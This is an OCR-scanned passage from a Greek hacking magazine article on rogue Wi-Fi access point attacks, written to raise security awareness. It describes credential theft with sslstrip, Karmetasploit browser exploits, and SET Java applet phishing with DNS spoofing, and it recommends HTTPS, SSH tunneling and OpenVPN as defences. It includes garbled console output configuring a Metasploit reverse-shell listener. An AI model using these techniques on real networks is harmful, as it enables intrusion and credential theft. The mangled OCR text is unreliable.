ζημιά. Μια ἄλλη μέθοδος για την υποκλοπή usernames kai passwords 
περνάει μέσα апо ro sslstrip, ἑνα εργαλεἰο που λειτουργεί ως transparent 
proxy και υποκλέπτει credentials χρηστών апо διάφορα sites. To sslstrip 
δεν θα δουλέψει αν όλη η σύνδεση εἶναι HTTPS. Εδὠ κι αρκετὀ каро 
πολλά μεγάλα sites και υπηρεσίες (BA., n.x., Google, Facebook к.а.) επι- 
βάλλουν εξ ορισμού τις συνδέσεις HTTPS. Υπάρχουν ὁμως κι алла sites 
ὁπου *póvo* ro login εἶναι µέσω HTTPS κι εκεἰ το sslstrip εἶναι αποτελε- 
σματικὀ - και φυσικά επικἰνδυνο. 


Απόκτηση πρὀσβασης 


Εἰναι νοµἰζουµε φανερὀ бт! апо τη στιγμή που ελέγχουμε ro access point 
ουσιαστικά εἶναι σαν να έχουμε επιτύχει µια επίθεση ΜΙΤΜ για ὀλους τους 
χρήστες rou ΑΡ. Από κει και πέρα, µια απὀ τις πιο επικἰνδυνες ενέργειες 
που μπορούμε να κάνουμε εἶναι у’ αποκτήσουμε πρὀσβαση στους uno- 
λογιστὲς ενὸς ἡ περισσοτέρων πελατών, εξαπολύοντας στην ουσία µια 
τυφλἠ επίθεση της λογικἠς "όποιον πάρει o χάρος”. Δείτε για παράδειγµα 
το Karmetasploit, µια πλατφόρμα αυτοματοποιημένων επιθέσεων ειδικἁ 
για πελάτες ασύρματων δικτύων, που λειτουργεἰ μέσα апо ro Metasploit: 


www.offensive-security.com/metasploit-unleashed/Karmetasploit 


To Karmetasploit δοκιμάζει ша σειρἆ апо γνωστά web browser exploits 
για κάθε χρήστη rou AP. Av κἄποιο anó ra exploits πετύχει o attacker 
αποκτἀ πρόσβαση στο μηχάνημα ἡ στα μηχανήματα ὁπου τρέχουν οι £u- 
na8eic browsers. Κατά τη διάρκεια της επίθεσης, όλοι οι πελάτες του ΑΡ 
το μόνο που μπορούν να βλέπουν στους browser που ἐχουν ανοικτούς 
εἶναι µια σελἰδα ενὸς υποτιθέµενου captive portal, η οποία τους προτρέ- 
πει... να περιμένουν. Αν тора κάποιος χάσει την υπομονὴ του και κλείσει 
τον Web browser ἡ τη σύνδεση, προφανώς η επἰθεση πέφτει στο κενὀ. 
To Karmetasploit, λοιπὀν, пара то γεγονὸς бт! εἶναι αυτοματοποιημένο 
και εκτελεἰ μαζικὲς επιθέσεις, εἶναι кабара θέμα τύχης ro av θα KaTa- 
φέρει κάτι. Поло апла, πριν την επιτυχία παρεμβάλλονται πολλά "av" 
τα οποία πρέπει όλα να ικανοποιηθούν. Ακόμη, π.χ., και να υποθέσουμε 
бт! ἑνας χρήστης του AP εἰναι τέρας υπομονής, αν δεν χρησιμοποιεὶ Kå- 
ποιον παλιὀ ἡ oxerikà παλιὸ web browser για τον onoio ro Karmetasploit 
γνωρίζει κάποιο exploit, o attacker θα κάνει µια τρύπα στο νερὀ. Ένας 
πιο πονηρὸς attacker ἰσως δοκίμαζε µια περισσότερο στοχευµένη επἰθε- 
ση. Θα μπορούσε, π.χ., να χρησιμοποιήσει ro Java Applet Attack Method 
του SET ὥστε να φτιάξει ἑνα τοπικὀ αντίγραφο ενὀὸς δημοφιλούς site, 
το οποίο όμως θα προκαλεἰ τους επισκέπτες να τρέξουν ἑνα malicious 
payload σε Java (δεν θα τους λέει бт! εἶναι malicious, фиска :D) Με λίγο 
DNS spoofing ὁλο και κάποιος χρήστης θα βρεθεί στο site του SET avri 
για TO κανονικὀ και θα κληθεί να τρέξει то Java Applet. Av το κάνει kai то 
antivirus του μηχανήματός του δεν εντοπἰσει кат! παράξενο, o attacker 
θα ἐχει πετύχει το σκοπὀ του! 


Αντἰ επιλόγου 


Θέλουμε να πιστεύουμε бт! μετὰ απ’ αυτὀ το ἆρθρο την enóuevn фора 
που θα βρείτε κάποιο ανοικτὀ ασύρματο δίκτυο θα σκεφτείτε δύο φορὲς 
πριν συνδεθείτε. Αν πάντως το κάνετε, υπάρχουν τρόποι για να ελαχι- 
στοποιἠσετε rov κἱνδυνο. Κατ’ ελάχιστον, οφείλετε να χρησιμοποιείτε 


Δωρεάν γεύμα nou βγαίνει &ivó! 
ML 


µόνο συνδέσεις HTTPS και va µην κάνετε κλικ εδώ κι εκεἰ, акріта και 
απερἰσκεπτα. Αν πάντως ἐχετε πρὀσβαση σε ἑνα απομακρυσμένο Unix 
box τότε χάρη oro SSH tunneling μπορείτε να περνάτε ó^o το traffic του 
browser µέσα апо ἑνα κρυπτογραφημένο κανάλι kai ἐτσι να εἶστε ασφα- 
Айс. Ακόμα καλύτερα, αν ἐχετε κάποιον OpenVPN server τότε θα µπορεἰ- 
τε να περνάτε *ӧЛо* ro traffic rou laptop σας μέσα апо αυτὸ και να εἰστε 
απόλυτα ἠσυχος. Σε ἑνα τέτοιο σενάριο, το χειρότερο που θα μπορέσει να 
σας κάνει ο κακόβουλος κἀτοχος/διαχειριστὴς του АР που χρησιµοποιείτε 
θα εἶναι να σας πετάξει εκτὸς δικτύου. 


Παρεμπιπτόντως, ἐχετε δίκιο. Πρέπει να γράψουμε ¿va άρθρο γι’ αυτό το 
SSH tunneling αλλά και yia το OpenVPN. Θα το κάνουμε, προς το παρὸν 
όμως µπορείτε να συμβουλευτείτε και ra σχετικἀ ἄρθρα που έχουμε στο 
Parabing: 


e SSHtunneling for secure web surfing 
http://parabing.com/?p-552 


e Build your own OpenVPN home server in 7 easy steps 
http://parabing.com/?p-839 


х rootQbt: /pentest/exploits/set 


E, τόσο κόπο ёка- 
νε o attacker µας 
για να στήσει την 
παγίδα του. Να 
µην παραδοθεί για 
λίγο στον πειρα- 
OHÓ ν΄’ αποκτήσει 
πλήρη πρόσβαση 
στον Windows- 
based υπολογι- 
OTI) £VÓG EK TOV 
θυμάτων του; 


*X | rootGbt: /pentest/exploits/set 


Web Server Launched. Welcome to the SET Web Attack. 


Launching MSF Listener... 
This may ta a few to load MSF... 


Datab support has been disabled 


2 
-] * WARNING: 
.] * 


- 12 
- 8 nops 
11.12.04) 


encod 

today 

/program jun directives. 
)gram junk/me 
| junk/met 


fig for ERB 
ac us xploit/multi/handle 
et PAYLOAD windows/shell_reverse_tcp 
LHOST 0.0.0.0 
LPORT 443 


t ExitOnSession false 


esource (src/program 
tOnSession => 


a config 
Ckground job. 
«plo 
rted 
Starting th 
omman ll ss ( 20.30.105: > 192.168.55 :49232) at 2011-12 
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^» μάθετε yia то buffer overflow και δείτε 
επιθέσεις που TO εκμεταλλεύονται 


^ στἠστε TO δικὀ σας VCS κι αποκτήστε 
γαλήνη και ηρεμία 


^» κατανοήστε пос δουλεύουν εσωτερικά” 
τα προγράµµατα... 


...Ki απολαύστε πολλά περισσότερα θέµατα, για 
ἑνα 2012 που θα ξεκινήσει με τον καλύτερο 
δυνατὀὸ τρὀπο και εις πείσμα όλων θα το SUPE 
εξαιρετικἁ διασκεδαστικὀ *ка!* δημιουργικο- 


EIMA! О AARHE [ "E/MA! TO РС TOY. 
AYTO EINAI TO РС МОУ. NN. p| AYTOE ε/ νά HAIGIOZ" 


^x... 
AYTO EINAI 
XPIETOYC ENNA: 


KAI dYO MEPEZ 
CIA NA KAEIZEIE 
TIZ TPYNEZ 
APBI/ZTOYCENWIATIKA 70У AWO/z4AW 
PLUGINS BPHKEZ z70 
zTO WES. 


SERVER 


24-71-2017 WWW.LAKISER.COM 


Н διαφήμισή σας θα 
μπορούσε va εἶναι εδώ. 


Θα μπορούσε να 'ναι και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν &ivai. 


Προς το παρόν. 


niveis µας С E DOUME а ΞΕΡΕΤΕ m 
ξε POUE m ξέρετε « лыах va κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2usQdeltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (3) 
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